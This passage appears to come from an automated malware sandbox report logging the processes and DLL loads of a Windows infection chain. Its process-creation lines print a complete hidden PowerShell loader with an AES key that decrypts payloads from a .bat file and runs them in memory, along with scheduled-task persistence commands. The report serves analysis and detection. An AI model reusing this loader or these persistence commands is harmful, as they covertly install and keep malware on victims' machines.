([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net fileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: atl.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: amsi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msisip.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wshext.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: appxsip.dll
